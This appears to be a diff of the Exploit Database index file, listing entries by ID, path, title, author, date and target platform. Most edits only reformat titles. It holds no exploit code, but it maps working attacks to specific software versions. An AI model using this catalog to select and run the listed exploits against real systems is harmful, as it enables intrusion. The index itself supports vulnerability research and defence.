22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
|
||||
22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0
|
||||
22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
|
||||
22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
|
||||
|
@ -3491,7 +3491,7 @@ id,file,description,date,author,platform,type,port
|
|||
27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0
|
||||
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
|
||||
27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
|
||||
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
|
||||
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
|
||||
27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0
|
||||
27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0
|
||||
27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0
|
||||
|
@ -3910,7 +3910,7 @@ id,file,description,date,author,platform,type,port
|
|||
30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0
|
||||
30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos,0
|
||||
30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
|
||||
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
|
||||
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
|
||||
30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
|
||||
30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
|
||||
30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
|
||||
|
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
|
|||
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0
|
||||
33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0
|
||||
33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0
|
||||
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
|
||||
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
|
||||
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
|
||||
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
|
||||
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0
|
||||
|
@ -4325,7 +4325,7 @@ id,file,description,date,author,platform,type,port
|
|||
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
|
||||
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
|
||||
34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0
|
||||
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
|
||||
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
|
||||
34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0
|
||||
34279,platforms/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0
|
||||
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
|
||||
|
@ -5003,7 +5003,7 @@ id,file,description,date,author,platform,type,port
|
|||
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
|
||||
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
|
||||
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
|
@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
|
|||
39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
|
||||
39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
|
||||
39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
|
||||
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
|
||||
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
|
||||
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
|
||||
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
|
||||
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
|
||||
|
@ -5216,7 +5216,7 @@ id,file,description,date,author,platform,type,port
|
|||
40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
|
||||
40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
|
||||
40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0
|
||||
40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0
|
||||
|
@ -5365,7 +5365,7 @@ id,file,description,date,author,platform,type,port
|
|||
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
|
||||
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
|
||||
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
|
||||
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
|
||||
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
|
||||
41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0
|
||||
41213,platforms/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos,0
|
||||
41214,platforms/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0
|
||||
|
@ -5419,7 +5419,7 @@ id,file,description,date,author,platform,type,port
|
|||
41637,platforms/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,windows,dos,0
|
||||
41639,platforms/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,windows,dos,0
|
||||
41643,platforms/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
- Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",hardware,dos,0
|
||||
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41646,platforms/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41647,platforms/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41648,platforms/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
|
@ -5506,7 +5506,7 @@ id,file,description,date,author,platform,type,port
|
|||
42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0
|
||||
42017,platforms/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",multiple,dos,0
|
||||
42018,platforms/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",multiple,dos,0
|
||||
|
@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port
|
|||
42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
|
||||
42970,platforms/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",linux,dos,0
|
||||
42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0
|
||||
42969,platforms/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
|
@ -5794,9 +5795,9 @@ id,file,description,date,author,platform,type,port
|
|||
317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
|
||||
319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0
|
||||
320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0
|
||||
321,platforms/multiple/local/321.c,"BSD & Linux umount - Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
|
||||
321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
|
||||
322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0
|
||||
325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
|
||||
325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
|
||||
328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0
|
||||
330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0
|
||||
331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0
|
||||
|
@ -5880,7 +5881,7 @@ id,file,description,date,author,platform,type,port
|
|||
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
|
||||
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
|
||||
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
|
||||
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure",2005-02-08,Kozan,windows,local,0
|
||||
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0
|
||||
803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0
|
||||
811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0
|
||||
816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0
|
||||
|
@ -8594,7 +8595,7 @@ id,file,description,date,author,platform,type,port
|
|||
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
|
||||
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
|
||||
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
|
||||
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
|
||||
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
|
||||
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
|
||||
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
|
||||
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
|
||||
|
@ -8643,7 +8644,7 @@ id,file,description,date,author,platform,type,port
|
|||
35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
|
||||
35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0
|
||||
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0
|
||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||
35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
|
||||
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
|
||||
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
|
||||
|
@ -9284,7 +9285,8 @@ id,file,description,date,author,platform,type,port
|
|||
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
|
||||
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
|
||||
42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
|
||||
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
|
||||
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
|
||||
42974,platforms/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow",2017-10-11,"Parichay Rai",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -9600,7 +9602,7 @@ id,file,description,date,author,platform,type,port
|
|||
969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21
|
||||
970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164
|
||||
975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow",2005-05-01,muts,windows,remote,21
|
||||
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
|
||||
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,windows,remote,0
|
||||
977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
|
||||
979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0
|
||||
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25
|
||||
|
@ -10915,7 +10917,7 @@ id,file,description,date,author,platform,type,port
|
|||
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
|
||||
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
|
||||
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
|
||||
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
|
||||
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
|
||||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
|
@ -11212,7 +11214,7 @@ id,file,description,date,author,platform,type,port
|
|||
16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0
|
||||
16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0
|
||||
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
|
||||
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
|
||||
16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
|
||||
16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
|
@ -11766,7 +11768,7 @@ id,file,description,date,author,platform,type,port
|
|||
18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
|
||||
18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0
|
||||
18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
|
||||
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0
|
||||
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,windows,remote,0
|
||||
18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0
|
||||
